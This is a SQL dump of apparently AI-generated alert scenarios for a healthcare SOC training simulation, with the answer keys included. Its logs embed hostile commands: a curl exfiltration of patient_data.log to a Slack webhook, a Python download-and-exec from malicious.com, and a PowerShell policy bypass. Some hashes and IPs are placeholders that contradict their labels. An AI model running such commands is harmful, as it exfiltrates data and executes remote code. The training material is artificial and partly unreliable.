activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://github.com/malicious-repo/document\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosting a known malicious document\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"alerts@securelogin-support.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain associated with known phishing campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target mail server\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email originated from a known malicious IP and contained a link to a GitHub repository hosting a malicious document.\"}', 'Expert', 'TI', 9, 1, 
'HEALTHCARE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"APT41 Spear-Phishing Attempt Detected\",\"date\":\"2026-03-15T20:58:16.253Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1771, 'Lazarus Group C2 Communication via Slack', 'high', 'Recorded Future', 'Detected C2 communication from an internal server to an external IP associated with Lazarus Group using Slack as a covert channel.', 'Data Exfil', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-14T23:30:47Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.55\",\"dst_ip\":\"203.0.113.77\",\"username\":\"svc_backup\",\"hostname\":\"server02\",\"command_line\":\"/bin/bash -c \'curl -X POST -d @/var/log/patient_data.log https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX\'\"}', '2026-03-15 19:56:28', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with Lazarus Group C2 infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/bin/bash -c \'curl -X POST -d @/var/log/patient_data.log https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected suspicious data exfiltration command\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.2.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised server\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The svc_backup account on server02 (192.168.2.55) used curl to POST /var/log/patient_data.log to a Slack incoming webhook, and the destination 203.0.113.77 is tied to Lazarus Group C2 infrastructure; treat this as confirmed exfiltration of patient data over a trusted SaaS channel, isolate the host, block the destination, rotate the svc_backup credentials, and revoke the Slack webhook captured in the command line.\"}', 'Expert', 'TI', 9, 1, 'HEALTHCARE', NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.256Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-14T23:30:47Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.55\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"server02\\\",\\\"command_line\\\":\\\"/bin/bash -c \'curl -X POST -d @/var/log/patient_data.log https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.256Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-14T23:30:47Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.55\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"server02\\\",\\\"command_line\\\":\\\"/bin/bash -c \'curl -X POST -d @/var/log/patient_data.log https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.256Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-14T23:30:47Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.55\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"server02\\\",\\\"command_line\\\":\\\"/bin/bash -c \'curl -X POST -d @/var/log/patient_data.log https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.256Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated 
event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-14T23:30:47Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.55\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"server02\\\",\\\"command_line\\\":\\\"/bin/bash -c \'curl -X POST -d @/var/log/patient_data.log https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.256Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-14T23:30:47Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.55\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"server02\\\",\\\"command_line\\\":\\\"/bin/bash -c \'curl -X POST -d @/var/log/patient_data.log https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX\'\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1772, 'APT29 Zero-Day Exploit on EHR System', 'critical', 'Anomali', 'A zero-day exploit was used against the Electronic Health Records (EHR) system, leading to unauthorized access to sensitive patient data.', 'Malware', 'T1210', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T05:12:33Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.25\",\"dst_ip\":\"10.0.0.10\",\"username\":\"unknown\",\"hostname\":\"ehr01\",\"command_line\":\"/usr/bin/python -c \'import urllib2; exec(urllib2.urlopen(\\\"http://malicious.com/exploit.py\\\").read())\'\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}', '2026-03-15 19:56:28', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with APT29 zero-day exploits\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/bin/python -c \'import urllib2; exec(urllib2.urlopen(\\\"http://malicious.com/exploit.py\\\").read())\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution detected using zero-day exploit\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.3.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised EHR server\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The zero-day exploit was successfully executed, compromising the EHR system and allowing unauthorized access to patient data.\"}', 'Expert', 'TI', 9, 1, 'HEALTHCARE', NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.259Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:12:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.25\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"ehr01\\\",\\\"command_line\\\":\\\"/usr/bin/python -c \'import urllib2; exec(urllib2.urlopen(\\\\\\\"http://malicious.com/exploit.py\\\\\\\").read())\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.259Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:12:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.25\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"ehr01\\\",\\\"command_line\\\":\\\"/usr/bin/python -c \'import urllib2; exec(urllib2.urlopen(\\\\\\\"http://malicious.com/exploit.py\\\\\\\").read())\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.259Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:12:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.25\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"ehr01\\\",\\\"command_line\\\":\\\"/usr/bin/python -c \'import urllib2; 
exec(urllib2.urlopen(\\\\\\\"http://malicious.com/exploit.py\\\\\\\").read())\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.259Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:12:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.25\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"ehr01\\\",\\\"command_line\\\":\\\"/usr/bin/python -c \'import urllib2; exec(urllib2.urlopen(\\\\\\\"http://malicious.com/exploit.py\\\\\\\").read())\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.259Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:12:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.25\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"ehr01\\\",\\\"command_line\\\":\\\"/usr/bin/python -c \'import urllib2; exec(urllib2.urlopen(\\\\\\\"http://malicious.com/exploit.py\\\\\\\").read())\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1773, 'Fancy Bear DGA Domain Communication Detected', 'high', 'MISP', 'Detected DNS requests to a DGA domain associated with Fancy Bear\'s malware infrastructure, indicating possible infection.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:23:56Z\",\"event_type\":\"dns_request\",\"src_ip\":\"10.1.1.50\",\"dst_ip\":\"93.184.216.34\",\"username\":\"svc_user\",\"hostname\":\"client01\",\"domain\":\"xyxqwe123.biz\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-15 19:56:28', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"xyxqwe123.biz\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Domain generated by DGA linked to Fancy Bear\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of infected client machine\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware using DGA for C2 communication\"}}],\"expected_actions\":[\"block_domain\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The DGA domain is linked to Fancy Bear\'s infrastructure, indicating a potential malware infection on the client machine.\"}', 'Expert', 'TI', 9, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.262Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:56Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.1.1.50\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"svc_user\\\",\\\"hostname\\\":\\\"client01\\\",\\\"domain\\\":\\\"xyxqwe123.biz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.262Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:56Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.1.1.50\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"svc_user\\\",\\\"hostname\\\":\\\"client01\\\",\\\"domain\\\":\\\"xyxqwe123.biz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.262Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:56Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.1.1.50\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"svc_user\\\",\\\"hostname\\\":\\\"client01\\\",\\\"domain\\\":\\\"xyxqwe123.biz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.262Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:56Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.1.1.50\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"svc_user\\\",\\\"hostname\\\":\\\"client01\\\",\\\"domain\\\":\\\"xyxqwe123.biz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.262Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:56Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.1.1.50\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"svc_user\\\",\\\"hostname\\\":\\\"client01\\\",\\\"domain\\\":\\\"xyxqwe123.biz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1774, 'Suspicious Login Attempt from Known IP Range', 'medium', 'Wazuh', 'Multiple login failures were detected from an IP range known for benign network scans, potentially triggering a false positive.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:17:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.200\",\"dst_ip\":\"192.168.0.50\",\"username\":\"admin\",\"hostname\":\"gateway01\",\"failed_attempts\":10}', '2026-03-15 19:56:28', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP associated with benign scanning activities; no malicious intent\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted gateway\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Despite the failed login attempts, the source IP is known for benign activities and does not indicate a true threat.\"}', 'Expert', 'TI', 9, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:17:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"gateway01\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-15T20:57:16.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid 
user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:17:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"gateway01\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-15T20:56:16.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:17:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"gateway01\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-15T20:55:16.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:17:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"gateway01\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-15T20:54:16.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:17:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"gateway01\\\",\\\"failed_attempts\\\":10}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 
100\"}}', 0),
(1775, 'Cozy Bear Process Hollowing Attack', 'critical', 'Splunk', 'Detected a process hollowing attack on a healthcare network server, likely linked to Cozy Bear\'s recent campaigns.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T06:50:21Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.5.75\",\"dst_ip\":\"192.168.5.76\",\"username\":\"svc_process\",\"hostname\":\"server03\",\"command_line\":\"powershell.exe -exec bypass -file C:\\\\temp\\\\malicious.ps1\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\"}', '2026-03-15 19:56:28', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to process hollowing malware used by Cozy Bear\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -exec bypass -file C:\\\\temp\\\\malicious.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Process execution using PowerShell bypass technique\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.5.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of infected server\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process hollowing technique is consistent with Cozy Bear\'s known TTPs, indicating a serious compromise.\"}', 'Expert', 'TI', 9, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.265Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.75\\\",\\\"dst_ip\\\":\\\"192.168.5.76\\\",\\\"username\\\":\\\"svc_process\\\",\\\"hostname\\\":\\\"server03\\\",\\\"command_line\\\":\\\"powershell.exe -exec bypass -file C:\\\\\\\\temp\\\\\\\\malicious.ps1\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.265Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.75\\\",\\\"dst_ip\\\":\\\"192.168.5.76\\\",\\\"username\\\":\\\"svc_process\\\",\\\"hostname\\\":\\\"server03\\\",\\\"command_line\\\":\\\"powershell.exe -exec bypass -file C:\\\\\\\\temp\\\\\\\\malicious.ps1\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.265Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.75\\\",\\\"dst_ip\\\":\\\"192.168.5.76\\\",\\\"username\\\":\\\"svc_process\\\",\\\"hostname\\\":\\\"server03\\\",\\\"command_line\\\":\\\"powershell.exe -exec bypass -file C:\\\\\\\\temp\\\\\\\\malicious.ps1\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.265Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.75\\\",\\\"dst_ip\\\":\\\"192.168.5.76\\\",\\\"username\\\":\\\"svc_process\\\",\\\"hostname\\\":\\\"server03\\\",\\\"command_line\\\":\\\"powershell.exe -exec bypass -file C:\\\\\\\\temp\\\\\\\\malicious.ps1\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.265Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:21Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.75\\\",\\\"dst_ip\\\":\\\"192.168.5.76\\\",\\\"username\\\":\\\"svc_process\\\",\\\"hostname\\\":\\\"server03\\\",\\\"command_line\\\":\\\"powershell.exe -exec bypass -file C:\\\\\\\\temp\\\\\\\\malicious.ps1\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
